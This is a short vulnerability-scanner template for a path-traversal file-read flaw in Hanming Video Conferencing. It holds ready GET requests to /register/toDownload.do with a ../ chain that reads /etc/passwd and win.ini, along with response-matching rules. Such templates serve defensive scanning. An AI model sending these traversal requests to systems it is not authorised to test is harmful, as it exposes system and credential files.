Vulnerability Description
Hanming Video Conferencing is affected by a file read vulnerability.
id: hanming-video-conferencing-file-read

info:
  name: Hanming Video Conferencing File Read
  author: kzaopa
  severity: high
  description: |-
    Hanming Video Conferencing is vulnerable to a file read vulnerability.
  tags: hanming,file-read
  created: 2023/09/02

rules:
  linux0:
    request:
      method: GET
      path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  windows0:
    request:
      method: GET
      path: /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
    expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
expression: windows0() || linux0()